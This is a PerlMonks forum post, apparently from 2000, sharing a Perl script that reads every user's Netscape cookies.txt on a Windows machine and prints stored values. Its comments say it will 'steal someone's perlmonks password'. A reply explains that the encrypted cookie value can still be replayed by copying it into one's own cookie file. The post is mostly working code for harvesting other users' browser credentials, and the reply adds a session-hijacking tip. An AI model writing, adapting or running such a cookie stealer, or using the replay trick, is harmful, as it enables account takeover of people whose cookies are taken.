Category: Web browser
Author/Contact Info ergowolf
Description: This program grabs all the Netscape cookie files on a box. I wrote a few quick routines to play with the parsed data. I may do more with this in the future. 
use strict;

my @cookies;
my @line;
my $user;

chdir "c:/Program Files/Netscape/Users/";
my @users = `dir /b`;

foreach $user (@users) {
chomp($user);
print "Displaying cookie passwords for $user.\n\n";
open(COOKIE, "<c:/Program Files/Netscape/Users/$user/cookies.txt");
push (@cookies, <COOKIE>);
shift(@cookies);
shift(@cookies);
shift(@cookies);
shift(@cookies);

    foreach (@cookies) {
    @line = split(/\s+/,$_);

# list of websites that have given cookies
#    print "The website is @line[0].\n";

# boards.stratics.com
    #    if (@line[$_] =~ m/boards.stratics.com/) {
    #    my @stratics = (@line[5], @line[6]);
    #    print "boards.stratics.com\n";
    #    print "@line[5]\t";
    #    print "@line[6]\n";
    #    }

# steal someone's perlmonks password from there Netscape cookie file
# they may be a maximum of 10 characters.  The password is 
# still unusable, because it is encrypted.
    
        if (@line[$_] =~ m/perlmonks.org/) {
        print "@line[0]\n";
        my @perlmonks = split(/\%/, @line[6]);
        print "username: @perlmonks[0]\n";
        print "password: @perlmonks[1]\n";
        }

    }
}

close(COOKIE);
Replies are listed 'Best First'.
RE: Netscape client side Cookie Cracker
by turnstep (Parson) on Jun 10, 2000 at 18:57 UTC

    > # steal someone's perlmonks password from there Netscape cookie file
    > # they may be a maximum of 10 characters. The password is
    > # still unusable, because it is encrypted.

    Well, it is still usable - just copy it to your own cookie file and voila! Netscape sends whatever is in the cookies file, it doesn't matter if it is human readable or not. Perlmonks is responsible for doing the decoding. Probably just using crypt anyway :)

[reply]

Back to Code Catacombs